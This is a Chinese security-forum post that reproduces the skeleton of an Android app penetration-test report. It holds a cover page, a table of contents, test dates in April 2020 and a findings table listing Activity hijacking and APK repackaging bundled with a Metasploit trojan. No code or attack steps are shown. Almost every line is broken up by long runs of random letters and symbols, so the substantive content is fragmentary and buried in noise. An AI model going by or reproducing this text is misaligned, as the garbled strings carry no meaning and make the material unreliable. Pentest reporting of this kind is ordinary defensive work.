找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4378|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1 Z7 u7 @: x# E- | - D; X [. Z* ^! k6 L8 u* Z, S3 g6 Y

5 `- {0 w: |% _8 g, e8 S, r5 J1 n2 P- E# d
5 G. V/ K1 Z5 ]; K3 x- Q H Y/ v : s4 n3 w8 `. E0 A

* m! o- B3 d, [8 u; L1 r 9 i* `# v7 Y. w5 S- x% ~, L
$ s7 c, p( F, Y 7 S" m% {6 t, \& x: _

, \; z: `: ^/ B' p. E$ k4 Y4 O" I & v% m) \% Z# O5 e. F+ q 文档编号:                ) a2 E5 p2 w3 y' |- h+ L; U7 F2 @ : }6 V: x- U) [. p; v

; `9 r5 g! m3 W" X2 @/ A . @& s+ I. s. q/ }3 L9 F" T3 ~

& p# l! I3 a9 j) k* ]! X6 S % H" c6 t2 [3 c S   1 L" z3 B3 `- v3 A7 U- a5 a+ z4 k$ I + u% |* [* U. z* m& X

, t( u4 V, N5 v8 N& s: I 0 J" O: g) F$ U Z1 O

" t& c6 w% M' N2 O- u8 S: I. B" D( j$ Q, k5 {   y1 M8 D' f1 l+ ]( p 6 `+ n! n0 A$ b2 W# W% q; x

6 ]. ~$ q, k9 y0 z0 }& d1 n$ k! J3 I & l: `0 r; {7 M$ ]* s( c. z

3 S% y. L% A' N0 }/ R; o7 h ) d; b4 ?/ x9 c: R$ F4 N   D8 _" D0 ^3 I" I. q2 ^ q , @3 [ n [# S; r) T9 R5 d

0 `; x4 M$ Y8 x( J4 e6 q: q 4 ~2 I V l* p

$ Y7 B; v" x+ g: @ & e/ v' V) g! p+ @ J   . q0 M5 C& L3 s& o1 k& S/ U % x2 v2 O" A3 [3 V% u1 _; J7 A

# O3 G7 s" Z3 K/ ]# t3 t9 w2 B; _1 }2 Z( m) W2 U& J

1 b+ ]: c; o& ^1 ^) j# F+ y. u 5 |( V7 _! {# M+ S. S   % Z" b/ H2 Y j0 j0 Q( v: G# A - ^0 g7 u, O: r8 c* |5 ?2 C& g# W

8 h1 R C3 F& }; A+ E" T' `5 @) p 0 f4 x; r- G* D; B4 c

/ i/ w/ X; g$ S# A- x - m) w1 {. w3 F1 Q4 O7 s 某某某APP渗透测试 - S* k$ u; M6 T1 A' I% O! j x. K8 `, f

* Y' {$ ~* X% A) X0 d. o 3 u o3 ]8 e- w' ^: l" g

; [8 V* l) G, @5 c0 t# q& _% L8 a* d/ G8 u8 y2 u0 j1 E   ( E# r G' X. K: H) [1 F# ~ % O! P0 A: Y9 s

$ G# Y M3 R$ w1 F% _ 8 X- k4 N) u' W3 ? h

0 O3 r5 U6 J! `+ y* a " Q ]3 k+ x0 O3 ]+ a D   : v% t" e) Y# Z. ? H, u }3 }" O ( K) u2 R0 U/ Z

& G2 D" m' Z7 w8 W4 j* C1 `) @/ @6 E W

/ h. u: x' z# r* ?' Z" X ^, U; E; v' m! q$ P9 W4 Z   , U& _6 B; d% ~) x , y+ ]; ^; U% H8 ?$ l& h

% |; [+ u+ R7 n 3 I. F p" ?( ?( T6 H3 `6 m: ~

( |. z& X/ ~- y# Q# S+ m* b( O4 L ~, O4 s4 ?. G   X6 R+ w5 S1 s2 ~ u- _5 \ 5 k. J# _3 d* T" M: ~1 |2 y# V

" y" ]2 o& i8 e9 m4 H2 f `/ `5 M& Y. G/ p5 v9 Y9 c

I8 S* n5 y/ h$ b. [! o ; P5 w# ]$ f# P" g0 A. x 技 术 报 告 # h! w! c8 {8 y1 R . i7 n" R0 R) @' k

7 {# k, i0 x2 T: F: W 8 [ k" g+ z" `

1 ^ I! B m# q, E 7 E+ d: [" o) c3 @' D   " L$ T+ t4 m+ g5 o' B% w+ R # S0 u/ g. H- X* W

7 [+ ?) u: J( L8 z8 ^5 u1 j8 b0 o [. I( q. \0 h1 |0 G

) Q7 J& p: N% z5 z, c" t9 [$ d; y- h   " x; G" P, y j- r0 x3 ^ % ? `- U7 Z2 u$ Q

s% ]" m# W& }' A 9 m! T: s/ N( `

! {- F! R0 k, n+ R" d( G2 \5 f4 n! W/ H   9 P* a% ^' i) ~4 ]; j0 @ k. `6 @% d t, G, l# C% w4 R9 N$ g. O

$ P9 R7 q! D" }* m, V + _' T1 G3 }& ~7 v/ K. D

/ h/ K3 V4 r0 L! ?& U L 3 |9 n3 ^ l* p: A3 S   & ? U2 {5 L) f- \0 d# F: X1 @# S9 J2 d, f( }6 N# \$ U

7 {4 h9 q7 l& ?" J) R' `" w( b6 a. b$ G8 v0 t' W, m

7 b& t: ?2 S0 C) K + O. Q8 d; ~8 _7 i& R+ A   + @9 `4 m" q5 v& V4 G: U6 U5 j3 N 2 o* `7 w3 W1 i. c- E( m

2 B8 X @5 R( C2 L5 O8 y 3 S* a7 C1 |% k; {

' w& k) C9 m$ l" _2 K+ z1 @) `- r( q) ^- d8 m   ) v) N# i/ [) V6 n, h5 M5 Q 9 B f* _% F! U5 z3 j; B& t% f6 _+ j

( h" i0 B) r2 P9 {. A- X. G. X l, K' n$ g [! _; L g0 u

; i7 a2 s# a/ l) T3 B3 S. q. q4 c% }* ^: b- c+ R   : W: D8 p. b) Y7 H) ~4 a6 y. I ( f8 C% x3 u' X$ K" D

& s" N' @* u8 R( X& m2 } & E9 [3 v s% {; G3 m6 k. _( q e

' k* Z/ m3 l M! d- D7 } , m. M/ [1 F8 w5 Q3 a   6 ]/ w, y7 c0 Q- o2 h ? u; Q( x$ X3 b* _+ |1 G$ p

* \- E) [2 A4 ~# ]# c( K' A ' l! b2 j: s% `" g5 ?3 x

9 S8 B g- [! l, W* v" i ! f0 @6 O0 ]3 B: {) g `   & h2 H) I1 C; h4 N , b7 @0 A* y t6 ~

0 m. R* j$ a) O, V# _' S3 n' _6 g S t4 E9 p; q. Q& y% _' C6 d

& n+ Q, A3 Q% B$ r. p S4 G 9 x. q- ?3 I$ ~7 S: M: T   , O; s3 ^/ a$ B; t: W3 F! ? . D6 x l0 \8 O5 h

( N( [& U( P+ J9 e$ S $ A# E+ d/ t( m

6 L& ]) o3 Z& N9 R \$ ]! w v6 q / H" w9 `9 X: t! v8 e2 S   3 h3 m2 ?3 C2 n+ [, l 3 e; t0 a3 _" U# a7 M" B4 {

6 ^! Z. A, X& C # Z" p/ [4 c! u. X5 C

- O( _, `7 S# I( _. a : L# e3 |7 z- {5 I8 T; Y% a   3 }! O6 g7 {' x% c/ D5 @ k" R2 D1 d0 O* P& z1 V

) H# J7 a9 P, v+ E6 u- @ U* u' Q7 g# J

9 s7 f/ y f/ p6 \* V: J2 p; s $ ^; N3 ]" f6 Y, s+ u0 z   - l6 o L/ t( y. ^8 I" s. n" @* _+ D9 l

, ?. G9 @) o) G+ o* e ' b. X7 |' k' B3 C7 s. j# s

! _: I2 I1 s6 }4 x! D9 y* k: ~ 1 p- h. ?% C; A0 n   8 h; n+ L+ O4 {. y8 e X. h. R( z/ B. c4 b- ?/ p: B" V

1 U* O0 I. ^2 Y$ U- Q, F0 _4 J) W- A6 F5 [* t/ d

$ U9 Y( D. O5 Y* R- s4 `# R6 q/ q ' B" I( y) u' Z8 \, e1 n0 O: b' k   $ `3 g3 Q$ y# Y2 S; g/ U ( J* \ a* F1 E6 M5 z0 K! r; N

2 r( A' P9 G9 I8 }# P$ A ) [$ C5 n" }' \! _% Y

" f& l. j' Z- R( _- i. K , t9 I4 \$ o( t   ! r# T$ V8 T2 A+ D$ c" x9 |( p. K# N9 ]) J' a! W

( ^5 w t; _0 M% ]4 ? `7 ?; K4 p1 r( I6 }* X* o* F& h

6 e: b( f h4 i3 ~ " J5 X0 j0 ]. R   ! \6 I4 @% Y$ N : b5 e6 @ f r3 [/ y, Z

9 X* N* g4 Q8 W# d 4 \3 \' `6 p; g; s5 e

/ v8 v9 L* N2 J. j1 h & j/ h t8 n* N9 q- K0 P( `! ^ a   * a- c( Q& w9 C: ] ! m" D: |) J. B% S

7 T; J4 O. g5 o& x+ r9 b 5 F5 }% y( S2 E/ X

( N- l1 K# m" b/ Z' b4 e! z. _2 W; B4 e: t3 o 二〇二〇年 4 o/ H/ C# W. M) d" b: Q) D, O5 }- ]8 ~( B1 j1 k- N+ g* j, G

/ Q! c' S( I+ V. i% J. l: ?9 S3 n% w% N8 {4 a. [
0 J' w: L- o! Y2 A# B. ?, @5 S. A( ^, i# _
+ O( b# l. n0 w# k: P; }% n N5 `- S/ q; y
% B& B' f9 B Y j7 j4 O $ Z0 S c: v6 L9 n* w2 Z+ U; {3 x
4 J" y5 X6 Q1 ?; P, I 1 @5 ~. z/ |" Y9 B
$ z! O2 z `( ^/ g" Z$ f& Y/ k 6 T! n3 M; a! r# c6 T7 `- Z
2 g, V$ q6 W4 z" ] Y- d 9 G5 ^, N- a1 p5 s! n5 ]6 z" h8 ?
5 o) U& t% k3 }( L/ F" q8 w # m& @8 @! t2 Q& ?: U+ ^% ^" I+ N6 m
( a7 m3 l4 V% q7 @6 ` a: M % L* D" w) j+ j! Y: {

5 q* _1 l |2 s4 l! p 7 h0 }. A" g. s; k6 i3 p& {$ t3 j5 b. B 目 录 4 q: n+ q0 ^) V9 ~/ c' `: B( X$ f% C 9 t7 q0 U& s; b% A+ k

0 w. l2 T/ X9 ~8 @8 p- Y6 V3 b+ D3 U7 {; u% | " b( A( G2 ?7 X! O- u- S- R- p 1 V* j; m. j% o/ g

' _- N3 X( R; {* X1 X 0 p% t f$ Q1 ]9 n   - E8 v$ ?* q0 R4 q & v' e& i1 }$ j0 m; z7 r; T

: L& v) y+ b- D/ A% } @ ) g5 w* ^# P* }0 b" _

% t( `$ X0 F- c. M' A6 e5 u7 [2 t9 ^: T- ?/ C: ?9 S; T U0 U* r) R5 n 1 概述... 3 2 C" ~- n2 G, G / d1 P% Q: j1 l3 L6 Q D3 {

4 h/ Z7 v) Z9 V0 o/ t6 M; v / v1 z- v* L/ c+ r

# t4 t/ K+ P5 Q; p ; D2 K' I# V ]0 P+ D+ e1 [" ~ 1.2测试时间... 3 6 y W* D- r: y( d6 ]# z 8 i0 v1 ]; N% w9 Z

, v4 L5 {' K" [3 E . O0 O3 S; ]& ~/ V, V- o

s2 Q! ~' a8 S# L5 E+ X $ W1 Q$ T" t% g- L# c z3 ~ 1.3测试对象... 3 9 r5 Z0 ^1 m+ l. c8 P 4 @6 F* F. ?4 m# ^8 R4 j

2 @) y7 B7 [+ e , i4 i l4 W3 {& z6 H# |: H

6 n r& R6 m5 z6 {! h " r! |& D9 U& w" A 1.4测试结果... 3 % R4 ~% O8 M8 A 4 u$ ~+ v- t9 l$ Q9 L9 D3 } k

# P4 |* ]' ^1 }: Y 9 W3 w( w5 t2 @7 i

& @8 d0 b! m S% @6 X5 ] ! E$ Z$ x" V# X9 {( k$ u 2 检测结果... 4 ; n1 T1 |- c {$ s/ m0 K5 T * ~6 R8 q' J7 C3 I3 N; u; A4 u

9 C% d5 Y% }% ]9 t; k; e! q ! l5 D$ \5 z8 r

0 G/ W6 N ]9 P8 R" u& } / Q! x9 I+ s5 N3 G 2.1 某某某... 4 % [# O4 u$ A/ j/ [$ p/ N9 R2 \# k# P: t " d4 w0 e+ g% f; S# @

3 \9 x% J8 T- i) e & P$ O# I( Y5 {1 V/ J6 F& x

3 D/ |. b/ V1 [7 u 7 N# h+ u0 R) x 2.1.1检测目标... 4 8 Q& E/ J$ y: {# f; F" j/ L/ ^7 ? K- C# L; ]: `5 ?, |1 D( \; m

) v, d& d( P4 z1 x 7 v* A4 i7 i. r p

9 k; y9 r# P2 K; |9 p+ v % l& g) }1 s0 L% D1 ^ 2.1.2检测结果... 4 & B$ f Q3 \ ~% a R# p, X- W* ? ' l) e) q7 z" Y2 R! h$ O/ J

7 q* E! q7 _! Y0 |) T ; n- a/ n! L8 W1 x9 k2 |' ^

" q% ~# A( f& c) J , `/ l6 B2 o( c( { 2.1.2.1. 4 # i0 _- q7 Z1 H4 \! Z 9 ^5 t1 I, D8 _( M! J' X

& s6 {& z* X/ z; ^; C% @ J4 I" A$ f& ?$ N k

) X# J( m3 V0 {: E' e- u" z5 R1 a% ~. H5 s. s& E' o 2.1.2.2. 6 0 u. X. Y# d, T5 E5 u ! ]/ Y8 F& I8 [: X7 G

' j' c4 K3 M& N: u+ y# X/ d3 ^3 g4 m; P6 s O% K

" h, y# R ? g* L ! n: E( V, K; Z% Z2 G$ @2 [$ | & e, X& b1 `+ V- @+ I5 @ - V* }) r- |7 s0 x' r6 M/ g% ]

+ U6 t7 q6 }/ ?3 d1 Y! K, y l0 _ $ M- ^% k) P3 {+ W. O [
2 o* h- X j7 W! i& M/ ~ . b8 L M' \; h% h! t
$ {8 m6 W2 @9 t; F8 _0 t * Z4 U# u. X; j9 h- v
! _* A- S" J) K: I( g. m2 V9 L7 F, t
- Q) o ^+ O" _' B" |4 V' m2 C/ a( p( n) ~) `* t$ d

- Y* f1 z9 D1 _ ' n/ _! y: y* Q$ c+ X$ x0 P7 B) i 1 概述 / e, Z2 k; |+ |: z% j: ^+ z 5 l0 V6 a0 J0 n* z3 \3 |; D( I y. l( w: B

9 l2 ~- y& a3 k/ j/ I% m + H" j; r1 d# U3 F4 ^

+ V" ^/ W+ @2 W. B5 P6 n" v / d" ^& r, {( F% u 1.2测试时间 0 G( e: h0 h% ~8 v: p; y1 \- J, _! R$ u% d' k* z, I

/ ]) f2 Z8 C& I6 s9 \6 x7 q- Z ) N+ y: R/ O. e * ?" ]; q- @- P" V. Q5 _3 V9 E( b" U) I1 u8 V8 w; N* n( U7 k# c$ _6 B0 v. \3 e" ]% [5 E6 W* n+ a! S7 d% X* V9 e) u+ U. y$ P& S+ K7 m$ X' @1 S* [( C/ o5 w ~" N; {0 _3 c$ c2 ^0 c7 N( J2 s; y; U! a2 U6 N+ ?7 B' t/ e' C0 Y9 K/ S; Q' X/ `' h0 n( H* M* S3 h* T' X* _0 ^7 l; A6 ~" M9 k/ B$ S+ g# A+ f/ H( i, b \% B5 J2 N' N. g% a5 i( i2 A6 X, o9 f; O1 F- W: Y4 B* }6 n; z" m" b. \# R" K. e# Z d6 t) O% g* w1 I6 T& t& i! o {. ?. U) D& ]% e7 U0 `3 } A$ }# N, \' E! G0 w) @* y% H+ A; i2 |7 [1 G$ F, [: Y- x u% c5 C3 F. d- F5 g* l; G$ n4 z5 R) d. _: @1 X @+ K1 G( _6 _+ e! O0 g/ h1 a; [/ A* ]9 I/ w7 U, p& O- x4 { K' w& v' q9 H, G5 i [1 b2 z$ a/ v) R% Z' [7 P: U+ u) c# V% B# w, z* j, T5 u, f7 | b9 K( v1 k5 k
, v0 v2 W7 Q u! w9 v : \4 f; }6 m3 X- v5 T

* N, }; f2 [6 Z9 U 2 h$ v; u; D# c$ O 渗透测试时间 . N# q7 }9 A+ [* X0 V% a# Y/ }. u# b, U7 q2 t( V2 D

9 A) X; C2 |; }. I4 C# q4 y2 H ( x7 W) V) w7 Q$ s9 w* X6 F$ U9 w
, ?9 i, w4 k; B K , i2 y2 g9 W% h) T! ]

" L4 u3 N* v& Y' W/ b+ Y$ J0 i / u6 m$ g/ k4 m- d/ } 起始时间 6 W. Q3 ~! q) \9 l: {+ e$ q3 f & |) `8 q+ K [5 \# g8 H3 u: Q

+ w2 h: Z: ^$ ^ y0 x 1 b0 i# m& E* l3 @% V3 J3 K
0 o4 u. R# d7 q* O' G, ^( v& V' V, ~

) r. E. z5 Y; `$ ?" T 2 a/ ^* A1 F! f' c b% ]- V) v 202046 " `" f' A+ i7 i' g K H" j' m' b9 F: W/ d0 a

|. H: a$ q' u2 T( `/ j0 a) @ 1 C5 e% t, n2 W
; d" O! {4 R: [0 Y 8 A. u1 s0 U# D! O

6 O5 w5 A# w5 n6 E2 K4 X$ h. U& A* j* @& k) H# [- r 结束时间 0 i. w& G5 H3 z2 y . f' j9 ^+ H. z# x; ], C6 t

9 F2 f9 d0 h0 o# S1 E! A 6 ~2 }; ~5 B2 \7 u6 o) y
6 I( d! f9 Z E. E4 ~. K , s9 @( j: Q6 T0 @

# f7 i$ m3 n4 ?! D3 C ) d5 ]( C L3 O: {) A3 B8 ^& c# i 202049 , p3 Q5 U1 o F, N % U7 v# \. {8 G9 |/ v

" v! t2 I9 E5 Y+ H2 n3 x! K2 J 9 G$ U% _) ?0 m: y2 U# O
$ i9 S4 p. l! a+ y( v2 K O6 F5 L2 a2 `4 z4 j) `# z7 V

" Y ~% `7 I6 ~% M& r3 k % F1 H3 t$ a- u! k 1.3测试对象 " y6 G' b: m1 p! Q 4 B# @) {3 }$ e# k

, n8 `- p2 q6 o; L, Q + A; |" S. O) f& o0 p

7 S" F( Q# ]9 |% m; L' c 4 ~. H- h$ Z! H7 s 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: % |! Q+ a+ m- b0 D" U8 `: b # L. n* _; \- ~, |

. `* X W( Y; m% Z% b" k9 V / c7 v0 _ U) B

j7 @' I- g, U; b 8 j% S7 z7 q1 p' R 1-1 检测对象 ( P C9 G' R# l& x# e+ i. Q' c: D* Z; Z$ }2 {

* q4 R0 U& G* G ^9 ~9 u& m: n ( ^2 h' X+ @! p5 s4 O * z3 M, h: \' a% L4 ` r! \: s! b5 V4 M: c+ F6 {) f' A# ~: z* ~* P$ f' @- z- w! Y/ b* A, I' ?& B! `! ~' s, u& O, {# H; D/ m" e$ M; r( ^8 d1 v. U7 S! P& ~" W8 X) B# G1 |3 Z" N# G# E- H9 I" O5 g8 |4 B# |6 `* V6 }* @ a* P+ t t' O, k [& V% m* V+ b7 u7 { S# R0 p0 e) o0 z1 S& H/ D) ^5 {# \0 ~5 e6 g8 @" ]5 r! d/ N/ u, d) s# g' i; |! S0 p9 K: C6 l# d; T1 X% B& d$ n0 v/ v4 U' e j- A9 t5 ]4 w" ]: B/ b& |6 l, _5 k; h% ]& E8 |# P% I+ P; a7 Q7 \; t3 C; u( t' E7 K" z3 n" O2 N- y8 T- k) i" ]7 D6 G% c5 W# i% Y; @) }4 Y1 j5 z y' K( ?* |2 k- l, q0 J+ n" D- z' ^5 N7 h5 D( R" ^2 V/ Z- l, P' q) _" \$ K/ I+ N) g* A' p( }* C4 N% B0 h" w% ^9 [5 X0 I$ Q% u# E- _ f+ |; F' Z7 S& `, I% i6 g. Z+ I% _
" R e- e1 i2 M8 Z5 J) t5 R1 [3 b9 C: L! H

8 E. s% u0 O) W6 l/ [( V6 [ 8 Q- A( {. V0 o- `; p* X2 _8 R. h+ M 序号 9 z& E0 G; r6 F- }9 q4 o' y; _5 }, y8 O, I* a* F

7 g; q( j- m* e. U( T# j& _' s r' Y 0 H1 T/ l# i6 }, c! S' V; k$ k
8 {7 L+ _# c( a # a" S$ H7 ?! p4 h: I

F) R" o7 I. Z! E ) b, G; H! Z; }9 k H. `: _ 测试对象 ; y. m$ k& U- j! P# [5 e ) K2 Q" ?- U' p2 M+ M% n9 S7 U

( |0 h: n% K. w6 ?" h + c- F% `, C3 u
8 C. g% K0 _/ T$ T3 ^0 f $ G F% \& g+ ?$ ~( e, m

/ G9 }4 W0 {5 K# G6 H7 U& l 2 j% _) r! N$ g: M$ I! b( r b$ H 测试地址 9 t7 X% v# ]; ]! f5 N. F6 o6 r* M/ d) n( y

9 U6 `* v1 O8 m0 C; \ 5 g# g: J- z! l! p5 i9 N
# ~- s8 J1 l, p % ]# V# g. A; X5 z

$ F# o5 [" B7 h+ m d9 {% H6 |% k4 J$ q+ w; Y5 t5 a Q 安全漏洞 - k4 O% Z H; h/ y, C" d/ `! u9 h9 v. m0 P5 V

Y9 o6 i1 r- X# b+ ]/ |4 i! X/ _1 J- j: C
* v3 W5 L5 a* o6 U* t 0 E+ J( I5 o1 i5 E" u/ U* l. |

* {: r) {! c1 x# R. Y4 w+ M5 T / z* R! `5 P; W* z+ o2 } 1 * l+ }) s0 L' R1 z( Z/ {) \' U$ Z: f W

1 h" y! G% h3 j/ g% j2 H . G& N' n5 P# W0 Y+ P" c, v
. m: }3 I; N# n2 f# L/ z ) Z/ x8 P( n/ I

3 B" s6 [' Y! W2 r( J: D/ x9 { 某某某安卓APP 1 B. d' [/ r7 g# C% D ) I' x' [' K: s) p& W: s- ?

* A! T0 Y5 e" S6 @; x$ H ! T6 q% f0 u5 e: J- K) R
5 [& z. y6 i3 H 3 q8 s! m% G6 `8 q( v- o3 N$ E. F

! U: i( K* U0 S, I* y s: y( g1 u9 ?; n. f8 n   ( J! W3 W7 a T8 {. n & z. Z/ ~- P u

/ x9 O0 N+ D1 b7 v% [0 _- Z( W1 h" z% x
) q3 ^+ [/ ~, v* c$ i) {$ x z 4 V' g) L# B4 S- Z' j* M! z

3 E4 [0 L5 z$ k1 r. ]: o* ~* n* }9 @# @( F& ~ 2 $ k8 {% m" L+ t & m8 h$ `* X0 E7 B( ]

5 Z, B4 u; ?- W$ l o5 j ) g0 q9 ~6 h- K0 w2 s+ S8 v
' N4 [/ g5 c) p( S ( a6 x' D" u0 W: H$ x

# H# S2 L0 _* B: X- s9 Z/ _( N% X+ ? 1.4测试结果 5 |7 x4 G: x* h4 | 3 b! D+ N/ p+ f- x& L

9 q/ \ M2 L% c8 }6 l) E& j+ K& q3 _6 x$ ^" M5 a, Z8 ]

* e: p9 m" Q0 {4 {0 v# e2 G" g- b / u% I9 y3 R9 M. _) {5 A! b( M 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: % C2 a3 b# U6 Z; F2 f* O9 H( K. C$ h( {; f

1 f6 g' U$ n5 x1 h" m; C' X: W$ @0 Y# n* j [: Y

7 Q5 C& t; R1 O4 I 6 `" D: o, g) L; V3 H9 W( |# D" L   1 I: B* |7 a2 b# b, \3 w9 i3 w; D6 E

, D0 u) E$ O% I8 F. l . F+ l$ T+ B% E% P2 C3 r
- f* \# G' C8 c1 }5 G1 [. a! L1 o$ I, ^! B" N1 f6 O) ? 2 k* j* d& u) I+ F. |$ u) V9 J T/ O: b; s* M; X+ ^) W' ]3 L9 |: o( f! A) z5 w" \4 }, X/ q, N# L, [) G9 M! j. @5 j& V; V' U: @* X& G. i9 Y9 p; c4 Z2 c l5 F: @+ a# W% K" P( t9 S6 z2 Q) [! C/ e" o) m. i' s6 Z: b5 \6 R' d* d& B5 M1 R7 T% U( f: y$ c0 h% p2 W$ m2 ?. v, x4 G" ?' b) @& m& M: m' I0 ~: c/ H6 g7 M, K0 ]: i9 H4 }% C2 Y+ ~* p" Z( V. \) Y% @3 z4 m8 A. E! n% w i: C) M8 n5 a: [! u' Q& t7 U ?7 F& f4 G5 j; @$ v! l, Z& o+ }! \5 A* {. ?( _ _. H6 g, U1 [* w2 w4 d4 {% y# ]6 I; G& b( e# h; `, k5 t! s. ]) Z5 I2 U3 Y" u7 t1 v ]! | W' q( w/ Q! l, q' k/ ^1 P. ^ T4 n) ?% Z: }. M- K8 T. ~% U0 _4 s5 A- }2 W3 f; b$ E- {! y: m% r0 J3 \. _. N. J' \% ~; l" P. j: g, I3 S0 t! C8 x; E2 i) |( h5 ?' K, S# A1 o3 i+ c$ f4 k+ q. o+ O$ |. Y) x: S0 q4 y& S4 d3 f, ]$ |# M4 I- `% |- u5 a9 o' B7 `; l* [9 a' x4 X/ I1 e& q: ]' C1 k ^+ q, B: m- }( r! `1 Q7 s+ U: P8 ` r9 A5 q/ m5 E# S( i& D- @) E+ t" q; @! V" \8 c" }* G' u' {' f: M3 }! u) a# ]* E7 y; n. X& @5 j& ?5 p& R, `- ^. p$ J2 t5 K* R3 @3 Y* n) w. F' S; n. ^, a O( q) I3 M/ Y! z9 W) V. }: b; p: Y' p( J/ J+ y# Q1 B5 A ?( N7 Q% R. k4 c4 s5 _0 I0 j' W: o' z6 D8 P: O- P) w6 \) ^
( q: d8 g$ y9 _7 S& f: S' ~; v : @& f$ r: G0 V3 ]- Q) B1 u1 @

8 N2 S$ b3 p4 F1 | , _) K9 |, g9 a8 ] 序号 ( R4 z9 T: T) P4 T* C! ^; D1 v; Q : w9 a* M2 h% }

9 E1 a0 N5 Z3 {8 h9 k- `5 y ! O) C' X! v' p5 `7 ~& Z" f
8 h. Z1 k5 z1 \5 P. r 9 D8 }6 Z0 R! `8 u8 E8 [9 e- X

5 _ \( i+ p$ r2 W 1 x* [, R# R( T5 J 系统名称 , }1 W6 O, ? f2 F) z' V/ g! | 1 ?& z* L+ s- z q- e% ^! d0 ~

/ m) w% E* l j f7 V) `3 d' b1 e' c9 y# L6 z0 E& U
+ \4 S+ c: W7 A# f4 t % K& c8 Q% ~& D

; f# T/ t6 k5 I" R $ Y' w# x& [# M# r 漏洞名称 & z7 p8 _# w) o& ^ 8 u# K8 G T; s. y+ ~

b* q, N; |0 g1 Z3 i # g+ ~ U. [2 d1 I% J3 m
2 R# w" G7 c3 B. q/ V5 _9 C0 t. q+ N! U# |: n+ l3 y1 O

# ]8 I" O6 ~# F4 b / r: ^# d% s2 A" w3 Q1 l4 J o1 y 漏洞危害 8 u. M( h, {( N- P6 y# X ^8 k% T' B! I: Z3 _7 [

& J& g8 |: [! u2 a l8 b6 p $ @( X# i; g/ S0 l; X
2 u [* X! O; @8 Q6 ] & j3 N. G& _5 Q3 s( I4 [5 v( D3 b! ?

$ l5 J, L6 g& a5 U ' i: G7 L+ Q* ` e" \; i) n 修复结果 [- V4 Y! c4 j& _; R A) e x- g, Z4 K) u

- B+ K' n. ?2 E0 t/ a) C5 o D) F6 E6 e , a& o4 s+ y- g- Y& G0 `: w7 P
, F* T) ?8 Z* C; L+ p9 _( t* W0 v$ I, ]& c4 W* z. D+ _

" G8 I) B; g5 Z; Y7 N7 n) a2 k3 m 8 A& u) @7 _- x. x 1 5 C" H9 a( q5 H5 s) \1 ~5 e$ Y 9 u/ i2 g9 S6 P" E7 o

3 D/ n: M% {" i1 y. q/ O+ G( z) }
. {. t( c k3 y9 n" A " C" H9 h! R; K! I9 L1 p3 \6 [

5 |7 ~3 p: n; _; t+ Z- A% ? 3 c) ?0 `3 k8 X0 G: q5 B# ?$ f 某某某某某某APP - S# t' J- q* B* `9 f5 M . g7 I/ |4 C! Q

. b1 Z& j" |4 a: T' { ' f- c6 n# \1 z% ~1 n
( y; S5 m$ C) [/ f1 b7 ]7 t7 J 5 z; }$ U9 _3 w- c

% D. T+ g- }, j* z9 n: ~ " ^8 t: o) y) {4 K Activity 劫持 0 E' k3 C% g/ v, C* O( ~: }8 e" Z 4 t2 f/ {$ ^' `. E6 T- k

! Y z+ x. L/ B) P3 a+ r7 n* z. l( q) \) D( W s6 ~

3 R" @2 a# a) U5 ] / d9 n5 M, [- N& A( ^   4 A' [0 u4 R2 ~: \ # @ {9 o- f( Z! m$ W$ u5 W

g' p7 H/ z: G2 q0 O% {, }8 ?5 n) J' A% p6 {
4 K5 U( N' M+ y; e ! r( K6 \( ^0 V

1 x- E1 @" B, G6 u ! y, W3 {% e1 R* d8 H8 G % o/ c0 N7 b' `6 |$ Z y+ _0 K - G$ ?- D' ?/ | l/ W# `/ j

" ~7 E: t* Z+ [5 e6 @ # |+ |# B: E+ y' ]) N9 ]) Q4 w U
' f4 l" R3 }' u9 P% J2 M5 c3 E d9 R }! `, T5 j8 P

; w, Q( V8 A1 G9 C% I 4 K% t9 m' C. Z$ ~   . U" ]. I5 p1 Z0 U# h# V6 V8 p2 o - @" B2 o" W1 x! j* n& _

- J4 ? ]. F: o u# a % z0 L" V' V5 N
8 H$ v/ d/ |3 \0 N, h( a % H( x( ~7 \# _, c. O4 t

- x4 u! z. o6 X 3 C8 ^' C3 U3 P; e# c 2 1 n R( W% x# g4 E ! H8 A" G; Z; j

& M. m1 l; A9 _2 J4 y& @- i3 ^ 7 T' b4 k( d/ u8 c1 ?
& ]) B6 ?8 k% W0 d+ D; }! g4 x & Y' G/ {8 ]- o" q2 p

" F4 |) H" P8 ^ % t+ T! y6 H& s/ c: B; S- q, ?7 p 某某某某某某APP ; M5 _0 {% N2 d3 \5 s. F6 V' [5 q5 b) f m# u- K

' c. W4 `- Y; s# q) a i4 P9 m8 c, K. x: C. E
0 I5 j, f' O; j6 Q5 {; Y . U9 `! j( [1 j: ]

/ V- M j( \7 ~6 v0 l 3 ~' K' m5 D( e D# |+ ?9 E 反编译二次打包捆绑木马、篡改APP代码 % a: j0 t8 A4 a A) x2 k8 y* a& m+ n$ \) r9 Z: P, a

9 S6 o: g: [/ s& i0 j( T Y/ e! ~7 ]/ w4 d
) t; T# x( ?9 J) t0 ] + g3 G, M, }2 {9 F" f

5 R" }" `2 w1 C& C: R 5 i2 E ]. B3 B7 A; h # R4 U9 G/ P- h0 f( X3 _ 8 {7 @1 `0 [' \/ z% i

8 z& E* }3 O6 v1 k! g 3 H$ V8 b C1 p" W" E+ t3 [8 H" M0 }
- F% G7 M, J. ~! h- B; g: T 8 ?8 M" C# ]. Z3 L1 k

+ k6 O( B& Q3 h6 b! b) X ' ^7 ]8 s4 W* s; S' ]0 Q% J5 U( o   # @, h, q) {1 j+ V # r7 u' U9 h0 f) x) u# E

& Z& |8 j8 H: O; x3 e " G5 ]: H$ y& g! f5 y
- |2 ^% T1 O% ^- j' L; ? G. _6 W" L- K: U" C9 P$ H
, g) I% x6 _% ~+ W7 V" O4 ]: C % h4 k( ?/ a) i: q- I

3 j4 b% l1 i' W% `% e* ]4 y 9 Q" l, v7 n+ d   3 d- U( n' F+ Z: H, Z W* G # D! t2 Y; H; b, I% V \# l* C

$ N# V& S! Q2 ^ ; U6 v7 O- r J9 |" z" y

